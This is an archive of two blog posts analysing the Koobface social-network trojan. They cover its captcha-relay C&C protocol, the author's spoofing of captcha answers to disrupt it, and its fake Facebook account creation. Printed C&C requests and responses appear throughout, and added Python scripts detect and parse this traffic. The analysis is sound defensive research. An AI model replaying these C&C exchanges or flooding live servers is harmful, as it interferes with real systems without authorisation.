Monthly Archive for January, 2010

Breaking Koobface’s Captcha Solving Process

It was a cold Sunday, so I decided to play a little bit with Koobface’s captcha breaking infrastructure.

I asked myself: Is it possible to poison Koobface’s captcha breaking infrastructure by spoofing captcha results? As I documented in my post Koobface – the social network trojan, the captcha breaking process used by the Koobface trojan works as follows:

  1. A bot would like to create a spoofed account (on Blogspot, Facebook, Myspace or whatever)
  2. The register page is protected with a captcha – so the bot grabs it and sends it to the C&C server (uuu20091124.info)
  3. Another infected computer asks the C&C server for work to do at the same time
  4. The C&C server sends the captcha to the infected client where the user of the computer solves the captcha
  5. The infected computer sends the result of the captcha back to the C&C
  6. The bot that originally sent the captcha now asks the C&C server if there is already a resolution for the captcha
  7. If so, the C&C server returns the result of the captcha back to the bot
  8. The bot can successfully register the spoofed account.

It’s pretty simple, so I decided to write a small script which simulates Koobface’s captcha breaking module (v2captcha.exe).

After writing some lines of code, I ran my script. The script just asks the C&C server for new captchas to break, generates spoofed captcha results and sends them back to the C&C server:

[17] 89.xxx.xxx.xx:3128 -> badboys -> 21303067 -> Success (145)
[16] 190.xxx.xxx.xxx:80 -> badboys -> 21303101 -> Success (146)
[10] 200.xxx.xxx.xxx:3128 -> badboys -> 21302809 -> Success (147)
[12] 191.xxx.xxx.xxx:8090 -> badboys -> 21303105 -> Success (148)
[18] 58.xxx.xxx.xxx:80 -> badboys -> 21302778 -> Success (149)
[22] 71.xxx.xxx.xxx:3128 -> badboys -> 21302802 -> Success (150)
[5] 64.xxx.xxx.xxx:8080 -> badboys -> 21302801 -> Success (151)
[19] 212.xxx.xxx.xxx:81 -> badboys -> 21303079 -> Success (152)
[1] 84.xxx.xxx.xxx:80 -> badboys -> 2130312 -> Success (153)
[8] 93.xxx.xxx.xxx:8080 -> badboys -> 21303115 -> Success (154)
[4] 77.xxx.xxx.xxx:3128 -> badboys -> 21302775 -> Success (155)

Some words about the output of the script: the value [xx] is the thread ID of the process, followed by proxy:port, followed by a string (“badboys”) that’s returned as the fake solution for the captcha, the TaskID (previously received from the C&C server), the response of the C&C server and finally the number of spoofed captchas so far:

[ThreadID] proxy:port -> spoofed captcha result -> TaskID -> status (counter)

To make sure that the spoofed captchas are really accepted by the Koobface Command&Control server (C&C), I just infected a computer with Koobface’s Blogspot module (v2newblogger.exe), which is being used to create fake Blogspot accounts. Afterwards I started my script again.

First of all, the infected computer tries to register a new Blogspot account. As expected, the trojan grabs the captcha and sends it to the C&C server uuu20091124.info via HTTP POST, calling the action save (a=save).

POST /captcha/?a=save&b=goo HTTP/1.0
Host: uuu20091124.info
Content-Type: binary/octet-stream
Connection: close
Content-Length: 2762

The C&C server responds with an HTTP 200 OK and returns a TaskID:

HTTP/1.1 200 OK
Date: Sun, 17 Jan 2010 16:12:19 GMT
Server: Apache/1.3.41 (Unix)
Cache-Control: no-cache
Connection: close
Content-Type: text/html

21300807

As you can see, the C&C server told the bot to use the TaskID 21300807 for further requests concerning this job.

In parallel, our script diligently asks for new tasks and “solves” them by sending a fake string back to the server. After a few seconds the output looks like this:

[9] 189.xxx.xxx.xxx:3128 -> badboys -> 21300821 -> Success (1330)
[22] 78.xxx.xxx.xxx:3128 -> badboys -> 21300812 -> Success (1331)
[4] 200.xxx.xxx.xxx:81 -> badboys -> 21300807 -> Success (1332)
[3] 41.xxx.xxx.xxx:8080 -> badboys -> 21300776 -> Success (1333)
[14] 94.xxx.xxx.xxx:3128 -> Unsuccessful
[4] 174.xxx.xxx.xxx:80 -> badboys -> 21300802 -> Success (1334)

Did you see it? Our script received the captcha with the TaskID 21300807 and sent back the word “badboys” as the solution. That’s the captcha from our bot! Now let’s go back to the bot and check what answer it gets from the C&C server for the captcha submitted a few seconds before:

GET /captcha/?a=query&b=goo&id=21300807 HTTP/1.0
Host: uuu20091124.info
Connection: close

The bot asks the server whether the captcha is already solved by calling the action “query” (a=query) with the TaskID 21300807. The C&C server responds:

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix)
Cache-Control: no-cache
Connection: close
Content-Type: text/html

3|badboy

Strike! The bot received “badboy” as the solution of the captcha – the captcha spoofing works!
Let’s run our script for some more minutes:

2297 seconds elapsed, spoofed 4438 captchas (119 unsuccessful).

Okay, that’s really nice. Within around 45 minutes more than 4’400 captchas could be spoofed!
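The HTTP exchange above is easy to recognise on a web proxy, which is the defender’s side of this story. The following Python script is an added example (it is not part of the original post and not Koobface’s own code): it flags the two request shapes shown above, POST /captcha/?a=save&b=goo and GET /captcha/?a=query&b=goo&id=<TaskID>, in proxy log lines and parses the status|solution body the C&C returns for a query. The log line layout (client IP, method, URL, HTTP status) is a constructed sample, not a real proxy format, and the meaning of the numeric status in 3|badboy is not documented here, so it is only passed through.

```python
"""Flag Koobface captcha-task C&C requests in HTTP proxy logs.

Added example: not code from the original post and not Koobface's own code.
It recognises the two request shapes shown in the post,
  POST /captcha/?a=save&b=goo              (upload a captcha, get a TaskID)
  GET  /captcha/?a=query&b=goo&id=<TaskID> (poll for the solution)
and parses the "status|solution" body the C&C returns for a=query.
The proxy log layout used below (client IP, method, URL, HTTP status) is a
constructed sample, not a real log format.
"""
from urllib.parse import parse_qs, urlsplit

# Actions observed in the post. Anything else under /captcha/ is still reported,
# because an unknown action is worth a look rather than silence.
KNOWN_ACTIONS = {"save": "captcha upload", "query": "result poll"}


def classify_request(url):
    """Return (label, task_id) for a Koobface-style /captcha/ request, else None."""
    parts = urlsplit(url)
    if parts.path.rstrip("/") != "/captcha":
        return None
    query = parse_qs(parts.query)
    action = query.get("a", [""])[0]
    if not action:
        return None
    label = KNOWN_ACTIONS.get(action, "unknown action %r" % action)
    task_id = query.get("id", [None])[0]  # only the poll carries a TaskID
    return label, task_id


def parse_result(body):
    """Parse the 'status|solution' body of an a=query reply, e.g. '3|badboy'.

    The meaning of the numeric status is not documented in the post, so it is
    returned as-is. Raises ValueError for bodies of any other shape (for
    example the bare TaskID returned for a=save).
    """
    status, sep, solution = body.strip().partition("|")
    if not sep or not status.isdigit():
        raise ValueError("not a status|solution body: %r" % body)
    return int(status), solution


# Constructed sample log lines: "<client> <method> <url> <http status>".
SAMPLE_LOG = [
    "10.0.0.5 POST http://uuu20091124.info/captcha/?a=save&b=goo 200",
    "10.0.0.5 GET http://uuu20091124.info/captcha/?a=query&b=goo&id=21300807 200",
    "10.0.0.9 GET http://www.example.com/index.html 200",
    "10.0.0.7 GET http://uuu20091124.info/captcha/?a=foo&b=goo 200",
]


def scan_log(lines):
    """Return (client, host, label, task_id) for every line that looks like C&C traffic."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 3:
            continue
        client, url = fields[0], fields[2]
        verdict = classify_request(url)
        if verdict is None:
            continue
        label, task_id = verdict
        hits.append((client, urlsplit(url).hostname, label, task_id))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("%s -> %s : %s (TaskID %s)" % hit)
    print(parse_result("3|badboy"))
```

The script keys on the URL shape rather than on the domain on purpose: the C&C host name in this post (uuu20091124.info) looks like a disposable one, so a rule that only matches the host would go stale quickly, while the /captcha/?a=… pattern is what the bot protocol itself depends on.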

You may ask yourself why the spoofing is so simple. There are several reasons:

  • Koobface is not doing any authentication of the bot
  • The C&C traffic is not encrypted/obfuscated in any way (plain text)
  • The C&C server sends each captcha to only one bot for solving instead of sending the same captcha to several bots and comparing the results
  • There is no limit on sending results to the C&C server
  • The server doesn’t even check whether a returned TaskID was actually assigned – you can just post any TaskID and the C&C server will accept it

Conclusion
Koobface’s captcha breaking infrastructure is weak. Any IP address is allowed to send tasks to and receive tasks from Koobface’s C&C servers. There is no authentication of the bot. So with a few simple lines of code you are able to disrupt Koobface’s captcha breaking infrastructure so massively that the captcha breaking process is no longer useful.

A positive effect of the captcha result spoofing is that it prevents the bot from successfully creating fake accounts on Blogspot, Facebook, Myspace etc. As a result of this, and due to the fact that Koobface needs such fake accounts on social networks to spread itself, the Koobface infection vector is broken.

As mentioned in my earlier post, it seems that the Koobface gang is offering a Captcha Decoder Service. By disrupting the captcha breaking process, the Koobface gang will lose money with every captcha that could not be solved successfully.

Happy captcha spoofing! :P

Dangerous friend requests on Facebook

While analyzing the Koobface trojan, I just made an interesting find. As mentioned in my post “Koobface – the social network trojan” from last year, Koobface uses social networks to spread itself. So let me ask you: What does a trojan need to spread itself on social networking sites? The answer is simple: A valid account. The cybercriminal has two possibilities to obtain valid accounts:

  • Using some phishing tricks to steal credentials
  • Creating fake accounts

There are two reasons why most cybercriminals try to phish the credentials of users of social networking sites instead of creating fake accounts on their own:

  • Most of the time the register forms of the social networking sites are protected with a captcha
  • At the moment, there is no reliable method to break captchas

As described in my post about Koobface last year, the Koobface trojan is able to “break” captchas (to be precise, the trojan doesn’t break the captchas itself; rather, it serves them to the infected bots, where they are solved by the users). By using this technique, it is able to create hundreds of fake accounts on social networks (per minute!).

Creating malicious Facebook accounts
To spread itself, the trojan creates spoofed Facebook accounts with which it posts malicious comments and sends messages containing a link to a malicious site. For those of you who are not familiar with Facebook: Before you can write a message to somebody or post on their wall, you have to be a friend of this person. So before the Koobface trojan can start to post malicious messages, it has to get some friends. Don’t be afraid, but even that is no problem for Koobface: It is able to send friend requests to hundreds of Facebook members.

When you log into Facebook, your browser saves a cookie on your computer. In fact, Koobface uses the Internet Explorer installed on an infected computer to log into Facebook. So what would happen if you were infected with Koobface and tried to access *your* personal Facebook account?

Uuuh?!?! What’s that?

That’s not my account ?!?! But who is Anyeta Fecher?
The answer is simple: That’s an account which was created by Koobface. But how does that work? I will show you:

First of all, the trojan sends a request to a zombie, calling the module grgen:

POST /.sys/?action=grgen&v=05 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; )
Content-type: application/x-www-form-urlencoded
Connection: close
Content-Length: 0

The zombie/proxy will return some information about the account which the infected bot should create:

HTTP/1.1 200 OK
Content-Type: text/html
Connection: close

#BLACKLABEL
SOFT|ADD
LOGIN|kulchvr.hhwgzlbsy/oon@hodma/erq
PASS|ci6h}r95df0
ID|21375
BIRTHDAY-YEAR|1982
BIRTHDAY-MONTH|7
BIRTHDAY-DAY|16
LOGS|1
[...]

Let’s take a deeper look at this response: It instructs the bot to create a new account (SOFT|ADD) using an email address (LOGIN) and a password (PASS). The email address in the LOGIN parameter as well as the password are scrambled (so you won’t be able to log in with these credentials). The zombie returns some more parameters like the birthday, the Facebook groups which the malicious account should join, etc. The bot will now start with the registration of the account. During the registration process, it will get a captcha from Facebook, which it sends to the C&C server. As soon as the captcha is solved, the C&C server returns the solution to the bot, which can now finish the registration process.

In the next step, the trojan sends a log back to the C&C server with some information about the registration of the Facebook account:

POST /log.php?id=21963&soft=ADD&build=0017 HTTP/1.1
accept-encoding: text/html, text/plain
COnnecTIon: cLOse
Host: 61.235.117.83
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; )
Content-type: application/x-www-form-urlencoded
Content-Length: 3759

20100109 16:38:53 ThreadID:1504 ProcID: 1516 reg build 0018
20100109 16:38:53 ThreadID:1504 ProcID: 1516 FB reg start
20100109 16:38:53 ThreadID:1504 ProcID: 1516 IE VERSION=7.0.5730.10
20100109 16:38:53 ThreadID:1504 ProcID: 1516 C:\Documents and settings\USER\Cookies
20100109 16:38:53 ThreadID:1504 ProcID: 1516 get work domain
20100109 16:38:53 ThreadID:1504 ProcID: 1516 create browser thread
20100109 16:38:53 ThreadID:1504 ProcID: 1516 Create google browser
20100109 16:38:53 ThreadID:1504 ProcID: 1516 Create main browser
20100109 16:38:53 ThreadID:1504 ProcID: 1516 getactivedomain
20100109 16:38:53 ThreadID:1504 ProcID: 1516 check inet
20100109 16:38:53 ThreadID:1504 ProcID: 1516 inet ok
20100109 16:38:53 ThreadID:1504 ProcID: 1516 trying
20100109 16:38:53 ThreadID:1504 ProcID: 1516 xxxxxxx.xx
20100109 16:38:54 ThreadID:1504 ProcID: 1516 valid domain
20100109 16:38:54 ThreadID:1504 ProcID: 1516 xxxxxxx.xx
20100109 16:38:54 ThreadID:1504 ProcID: 1516 work domain
20100109 16:38:54 ThreadID:1504 ProcID: 1516 xxxxxxx.xx
20100109 16:38:54 ThreadID:1504 ProcID: 1516 wait inet begin
20100109 16:38:54 ThreadID:1504 ProcID: 1516 Request params
20100109 16:38:54 ThreadID:1504 ProcID: 1516 #BLACKLABEL
20100109 16:38:54 ThreadID:1504 ProcID: 1516 SOFT|ADD
20100109 16:38:54 ThreadID:1504 ProcID: 1516 LOGIN|kulchvr.hhwgzlbsy/oon@hodma/erq
20100109 16:38:54 ThreadID:1504 ProcID: 1516 PASS|ci6h}r95df0
20100109 16:38:54 ThreadID:1504 ProcID: 1516 ID|21375
20100109 16:38:54 ThreadID:1504 ProcID: 1516 BIRTHDAY-YEAR|1982
20100109 16:38:54 ThreadID:1504 ProcID: 1516 BIRTHDAY-MONTH|7
20100109 16:38:54 ThreadID:1504 ProcID: 1516 BIRTHDAY-DAY|16
20100109 16:38:54 ThreadID:1504 ProcID: 1516 LOGS|1
20100109 16:38:54 ThreadID:1504 ProcID: 1516 switch to confirm mode
20100109 16:38:54 ThreadID:1504 ProcID: 1516 confirmer module start
20100109 16:38:54 ThreadID:1504 ProcID: 1516 checking login
20100109 16:38:54 ThreadID:1504 ProcID: 1516 C:\Documents and settings\USER\Cookies
20100109 16:39:08 ThreadID:1504 ProcID: 1516 fb logoff begin
20100109 16:39:13 ThreadID:1504 ProcID: 1516 logout link not found
20100109 16:39:13 ThreadID:1504 ProcID: 1516 trying to login
20100109 16:39:17 ThreadID:1504 ProcID: 1516 fill login
20100109 16:39:17 ThreadID:1504 ProcID: 1516 check persist
20100109 16:39:20 ThreadID:1504 ProcID: 1516 fill pass
20100109 16:39:22 ThreadID:1504 ProcID: 1516 try submit
20100109 16:39:22 ThreadID:1504 ProcID: 1516 click submit button
20100109 16:39:30 ThreadID:1504 ProcID: 1516 seem to be logged in
20100109 16:39:35 ThreadID:1504 ProcID: 1516 confirm acc start
20100109 16:39:40 ThreadID:1504 ProcID: 1516 ERROR: skip step link not found
20100109 16:39:40 ThreadID:1504 ProcID: 1516 login ok
20100109 16:39:45 ThreadID:1504 ProcID: 1516 groups confirm begin
20100109 16:39:53 ThreadID:1504 ProcID: 1516 groups confirm end
20100109 16:39:53 ThreadID:1504 ProcID: 1516 friend request confirm begin
20100109 16:39:58 ThreadID:1504 ProcID: 1516 friend request confirm end
20100109 16:39:58 ThreadID:1504 ProcID: 1516 scan friend begin
20100109 16:40:04 ThreadID:1504 ProcID: 1516 no friends found
20100109 16:40:04 ThreadID:1504 ProcID: 1516 scan friend end
20100109 16:40:04 ThreadID:1504 ProcID: 1516 Stats: added 0
20100109 16:40:04 ThreadID:1504 ProcID: 1516 PLACES DUMP
20100109 16:40:04 ThreadID:1504 ProcID: 1516
20100109 16:40:04 ThreadID:1504 ProcID: 1516 finished

As you can see, the log is quite detailed (yeah, “click submit button” and “scan friend end” sound funny…).
Now the trojan will start to “get some” friends. I suppose that the trojan parses the member list of the group which it received from the C&C server when it requested the grgen module.
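Two text formats appear in the grgen exchange and in the log.php upload above: the #BLACKLABEL block of KEY|VALUE lines that tells the bot which account to create, and the timestamped log lines the bot sends back. An analyst sorting through captured C&C traffic wants both in a structured form, so here is a parser for each, as an added example (not part of the original post and not Koobface’s own code). The sample data is copied from the post (the credentials are the scrambled ones shown there); the only assumption is that the formats are exactly as those samples look, since the post documents nothing more about them.

```python
"""Parse the two Koobface text formats captured in the post.

Added example: not code from the original post and not Koobface's own code.
It handles (1) the grgen response, a '#BLACKLABEL' header followed by
KEY|VALUE lines, and (2) the log.php body, lines of the form
'YYYYMMDD HH:MM:SS ThreadID:<n> ProcID: <n> <message>'. The sample data
below is copied from the post (the credentials are the scrambled ones shown
there); the formats are assumed to be exactly as those samples look, nothing
more is known about them.
"""
import re
from datetime import datetime

GRGEN_RESPONSE = """\
#BLACKLABEL
SOFT|ADD
LOGIN|kulchvr.hhwgzlbsy/oon@hodma/erq
PASS|ci6h}r95df0
ID|21375
BIRTHDAY-YEAR|1982
BIRTHDAY-MONTH|7
BIRTHDAY-DAY|16
LOGS|1
"""

# A shortened copy of the log.php body from the post, including the line
# that carries no message at all.
LOG_BODY = """\
20100109 16:38:53 ThreadID:1504 ProcID: 1516 FB reg start
20100109 16:39:30 ThreadID:1504 ProcID: 1516 seem to be logged in
20100109 16:39:40 ThreadID:1504 ProcID: 1516 ERROR: skip step link not found
20100109 16:40:04 ThreadID:1504 ProcID: 1516 Stats: added 0
20100109 16:40:04 ThreadID:1504 ProcID: 1516
20100109 16:40:04 ThreadID:1504 ProcID: 1516 finished
"""


def parse_blacklabel(text):
    """Return the KEY|VALUE pairs of a #BLACKLABEL block as a dict (order kept).

    Raises ValueError if the header is missing or a line has no '|' separator.
    Only the first '|' splits a line, so values are kept verbatim even when
    they contain odd characters (the PASS value has a '}' in it).
    """
    lines = [ln for ln in text.splitlines() if ln.strip()]
    if not lines or lines[0].strip() != "#BLACKLABEL":
        raise ValueError("missing #BLACKLABEL header")
    params = {}
    for line in lines[1:]:
        key, sep, value = line.partition("|")
        if not sep:
            raise ValueError("malformed line: %r" % line)
        params[key.strip()] = value
    return params


LOG_LINE = re.compile(
    r"^(?P<date>\d{8}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"ThreadID:(?P<thread>\d+) ProcID: (?P<proc>\d+)(?: (?P<msg>.*))?$"
)


def parse_log(text):
    """Return (timestamp, thread_id, proc_id, message) per line; message may be ''."""
    entries = []
    for line in text.splitlines():
        m = LOG_LINE.match(line.rstrip())
        if not m:
            continue  # skip lines of another shape instead of aborting the whole body
        ts = datetime.strptime(m.group("date") + m.group("time"), "%Y%m%d%H:%M:%S")
        entries.append((ts, int(m.group("thread")), int(m.group("proc")), m.group("msg") or ""))
    return entries


def summarize_registration(text):
    """Run duration, ERROR messages and the 'Stats: added N' count of one log.php body."""
    entries = parse_log(text)
    if not entries:
        return None
    duration = (entries[-1][0] - entries[0][0]).total_seconds()
    errors = [msg for _, _, _, msg in entries if msg.startswith("ERROR")]
    added = None
    for _, _, _, msg in entries:
        m = re.match(r"Stats: added (\d+)$", msg)
        if m:
            added = int(m.group(1))
    return {"duration_s": duration, "errors": errors, "added": added}


if __name__ == "__main__":
    for key, value in parse_blacklabel(GRGEN_RESPONSE).items():
        print("%-15s %s" % (key, value))
    print(summarize_registration(LOG_BODY))
```

The log parser deliberately tolerates lines it does not understand rather than failing, because the only thing known about the format is the one body shown above; the summary function is the kind of thing you would run over many captured uploads to see how often the registration step actually succeeds.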

Let’s wait a few minutes… and then take another look at the malicious profile:

As you can see, the Koobface bot just sent out more than 1’000 friend requests on Facebook within a few minutes! But what surprised me much more is the fact that all those people accepted the friend request. So I just ask myself why so many people accept friend requests from people they don’t even know.

Conclusion
Within a few minutes, more than 1’000 new friends were harvested by Koobface – all of them are potential victims now; as soon as the bot starts to send out posts/messages, it becomes a real threat to its friends.

So what we have learned:

  • Please be careful with friend requests from people you don’t know (this also applies to all other social networks like Myspace, Netlog, hi5 etc.)
  • If you find a malicious profile, report it to the administrator of the social network (e.g. by using the report button)
  • And last but not least: If you go to Facebook and you are logged in with an unknown profile, you are infected with Koobface….

Happy (and safe) social networking!
